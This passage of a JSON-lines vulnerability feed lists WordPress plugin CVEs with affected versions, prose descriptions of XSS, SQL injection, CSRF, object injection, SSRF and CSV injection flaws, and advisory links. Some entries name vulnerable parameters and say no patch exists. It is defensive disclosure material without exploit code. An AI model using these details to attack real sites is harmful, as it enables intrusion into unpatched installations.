",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0871","slug":"beaver-builder-lite-version","versionImpact":"2.7.4.2","description":"The Beaver Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Icon Widget 'fl_builder_data[node_preview][link]' and 'fl_builder_data[settings][link_target]' parameters in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26bfef74-214f-4257-afc7-730e82e80946?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26bfef74-214f-4257-afc7-730e82e80946?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032810\\\/beaver-builder-lite-version\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032810\\\/beaver-builder-lite-version\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2401","slug":"admin-page-spider","versionImpact":"3.20","description":"The Admin Page Spider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.20 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c33d9295-0c7f-45a0-9d62-4293c8bbef0b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c33d9295-0c7f-45a0-9d62-4293c8bbef0b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/admin-page-spider\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/admin-page-spider\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10014","slug":"flat-ui-button","description":"The Flat UI Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's flatbtn shortcode in version 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec5474ac-62d7-4431-b789-51c831dd1c20?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec5474ac-62d7-4431-b789-51c831dd1c20?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/flat-ui-button\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/flat-ui-button\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13625","slug":"tube-video-ads-lite","versionImpact":"1.5.7","description":"The Tube Video Ads Lite WordPress plugin through 1.5.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6bfabf1d-86f2-4d29-bc55-d618d757dcc6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6bfabf1d-86f2-4d29-bc55-d618d757dcc6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1971","slug":"users-customers-import-export-for-wp-woocommerce","versionImpact":"2.6.2","description":"The Export and Import Users and Customers plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.6.2 via deserialization of untrusted input from the 'form_data' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like deleting arbitrary files, retrieving sensitive data, or executing code, depending on the POP chain present.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/trunk\\\/admin\\\/modules\\\/export\\\/classes\\\/class-export-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/trunk\\\/admin\\\/modules\\\/export\\\/classes\\\/class-export-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/trunk\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/trunk\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259688\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259688\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/users-customers-import-export-for-wp-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/users-customers-import-export-for-wp-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b24b3d2-589f-47b2-bcdd-bebc87cafeda?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b24b3d2-589f-47b2-bcdd-bebc87cafeda?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1033","slug":"badgearoo","versionImpact":"1.0.14","description":"The Badgearoo WordPress plugin through 1.0.14 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cbb63e80-92aa-4e85-9d47-dc68211af97d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cbb63e80-92aa-4e85-9d47-dc68211af97d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8103","slug":"wpematico","versionImpact":"2.8.7","description":"The WPeMatico RSS Feed Fetcher plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.8.7. This is due to missing nonce validation in the handle_feedback_submission() function. This makes it possible for unauthenticated attackers to deactivate the plugin via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpematico\\\/tags\\\/2.8.7\\\/app\\\/plugin_functions.php#L207\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpematico\\\/tags\\\/2.8.7\\\/app\\\/plugin_functions.php#L207\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3333908\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3333908\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpematico\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpematico\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4473de39-a122-4c2e-9f64-50157b589a28?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4473de39-a122-4c2e-9f64-50157b589a28?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpematico.com\\\/releases\\\/\",\"name\":\"https:\\\/\\\/www.wpematico.com\\\/releases\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0729","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_save_sort_order function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted they can trick a site administrator into performing an action such as clicking on a link leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae8dbf54-ea62-4901-b34f-079b708ca0b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae8dbf54-ea62-4901-b34f-079b708ca0b5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3418","slug":"querlo-chatbots","versionImpact":"1.2.4","description":"The Querlo Chatbot WordPress plugin through 1.2.4 does not escape or sanitize chat messages, leading to a stored Cross-Site Scripting vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/407edb21-8fcb-484a-babb-fce96a6aede7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/407edb21-8fcb-484a-babb-fce96a6aede7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-41694","slug":"realbig-media","versionImpact":"1.0.6","description":"Cross-Site Request Forgery (CSRF) vulnerability in Realbig Team Realbig For WordPress plugin <=\u00a01.0.3 versions.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/realbig-media\\\/wordpress-realbig-plugin-1-0-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/realbig-media\\\/wordpress-realbig-plugin-1-0-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5709","slug":"widget-twitter","versionImpact":"1.0.9","description":"The WD WidgetTwitter plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 1.0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with contributor-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86cdbfec-b1af-48ec-ae70-f97768694e44?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86cdbfec-b1af-48ec-ae70-f97768694e44?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widget-twitter\\\/trunk\\\/twitter.php?rev=2212825#L161\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widget-twitter\\\/trunk\\\/twitter.php?rev=2212825#L161\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1519","slug":"wp-user-avatar","versionImpact":"4.14.4","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content \u2013 ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'name' parameter in all versions up to, and including, 4.14.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This requires a member listing page to be active and using the Gerbera theme.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ffd74de-6629-4088-ba5c-ac9dd5c6322c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ffd74de-6629-4088-ba5c-ac9dd5c6322c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/trunk\\\/src\\\/Themes\\\/DragDrop\\\/MemberDirectory\\\/Gerbera.php#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/trunk\\\/src\\\/Themes\\\/DragDrop\\\/MemberDirectory\\\/Gerbera.php#L93\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037126%40wp-user-avatar%2Ftrunk&old=3030229%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037126%40wp-user-avatar%2Ftrunk&old=3030229%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0839","slug":"feedwordpress","versionImpact":"2022.0222","description":"The FeedWordPress plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2022.0222 due to missing validation on the user controlled 'guid' key. This makes it possible for unauthenticated attackers to view draft posts that may contain sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ead46fd-5744-4fbb-9efd-980f9216abbc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ead46fd-5744-4fbb-9efd-980f9216abbc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/feedwordpress\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/feedwordpress\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2349","slug":"fancy-elementor-flipbox","versionImpact":"2.4.2","description":"The Fancy Elementor Flipbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Fancy Elementor Flipbox widget in all versions up to, and including, 2.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c877ac24-a6da-4e61-a669-a0224c9e3bb5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c877ac24-a6da-4e61-a669-a0224c9e3bb5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fancy-elementor-flipbox\\\/trunk\\\/widgets\\\/fancy-elementor-flipbox.php#L744\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fancy-elementor-flipbox\\\/trunk\\\/widgets\\\/fancy-elementor-flipbox.php#L744\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5448","slug":"paypal-pay-buy-donation-and-cart-buttons-shortcode","versionImpact":"1.7","description":"The PayPal Pay Now, Buy Now, Donation and Cart Buttons Shortcode WordPress plugin through 1.7 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c482fe19-b643-41ea-8194-22776b388290\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c482fe19-b643-41ea-8194-22776b388290\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9897","slug":"streamweasels-twitch-integration","versionImpact":"1.8.6","description":"The StreamWeasels Twitch Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sw-twitch-embed shortcode in all versions up to, and including, 1.8.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2922c85-7e16-48a1-9c43-c1a9d34571e0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2922c85-7e16-48a1-9c43-c1a9d34571e0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/streamweasels-twitch-integration\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/streamweasels-twitch-integration\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/streamweasels-twitch-integration\\\/trunk\\\/public\\\/class-streamweasels-public.php#L201\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/streamweasels-twitch-integration\\\/trunk\\\/public\\\/class-streamweasels-public.php#L201\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3171629\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3171629\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13608","slug":"track-logins","versionImpact":"1.0","description":"The Track Logins WordPress plugin through 1.0 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/408e6cad-f02d-455a-9943-32da77537da1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/408e6cad-f02d-455a-9943-32da77537da1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1970","slug":"users-customers-import-export-for-wp-woocommerce","versionImpact":"2.6.2","description":"The Export and Import Users and Customers plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.6.2 via the validate_file() function. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/trunk\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php#L175\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/trunk\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php#L175\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259688\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259688\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/users-customers-import-export-for-wp-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/users-customers-import-export-for-wp-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a4d7d40-8e0e-4251-8e25-3fd4ebd3a93e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a4d7d40-8e0e-4251-8e25-3fd4ebd3a93e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0688","slug":"spiritual-gifts-survey","versionImpact":"0.9.10","description":"The Spiritual Gifts Survey (and optional S.H.A.P.E survey) WordPress plugin through 0.9.10 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against only unauthenticated users.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1e2b77c3-ad45-4734-998a-c1722ebd1f4f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1e2b77c3-ad45-4734-998a-c1722ebd1f4f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0721","slug":"metform","versionImpact":"3.3.0","description":"The Metform Elementor Contact Form Builder plugin for WordPress is vulnerable to CSV injection in versions up to, and including, 3.3.0. This allows unauthenticated attackers to embed untrusted input into exported CSV files, which can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907471\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907471\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/core\\\/entries\\\/export.php?rev=2845078\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/core\\\/entries\\\/export.php?rev=2845078\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccd85a72-1872-4c4f-8ba7-7f91b0b37d4a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccd85a72-1872-4c4f-8ba7-7f91b0b37d4a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5468","slug":"slick-contact-forms","versionImpact":"1.3.7","description":"The Slick Contact Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'dcscf-link' shortcode in versions up to, and including, 1.3.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22c63226-2bc6-40be-a5d1-1bd169fc78b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22c63226-2bc6-40be-a5d1-1bd169fc78b8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slick-contact-forms\\\/tags\\\/1.3.7\\\/dcwp_slick_contact.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slick-contact-forms\\\/tags\\\/1.3.7\\\/dcwp_slick_contact.php#L71\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1496","slug":"featured-image-from-url","versionImpact":"4.6.2","description":"The Featured Image from URL (FIFU) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the fifu_input_url parameter in all versions up to, and including, 4.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d1ea1c5-6a9e-4b77-bfdf-62e50d4a4c03?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d1ea1c5-6a9e-4b77-bfdf-62e50d4a4c03?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-from-url\\\/tags\\\/4.6.2\\\/elementor\\\/widgets\\\/widget.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-from-url\\\/tags\\\/4.6.2\\\/elementor\\\/widgets\\\/widget.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037479%40featured-image-from-url%2Ftrunk&old=3034300%40featured-image-from-url%2Ftrunk&sfp_email=&sfph_mail=#file9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037479%40featured-image-from-url%2Ftrunk&old=3034300%40featured-image-from-url%2Ftrunk&sfp_email=&sfph_mail=#file9\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13603","slug":"wise-forms","versionImpact":"1.2.0","description":"The Wise Forms WordPress plugin through 1.2.0 does not sanitise and escape some of its settings, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks via malicious form submissions.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/234a8d22-e6c6-4819-9ac0-434a96b3462d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/234a8d22-e6c6-4819-9ac0-434a96b3462d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0687","slug":"spiritual-gifts-survey","versionImpact":"0.9.10","description":"The Spiritual Gifts Survey (and optional S.H.A.P.E survey) WordPress plugin through 0.9.10 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against only unauthenticated users.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c1e21e1-32f2-4a20-9262-80e1cdab534d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c1e21e1-32f2-4a20-9262-80e1cdab534d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
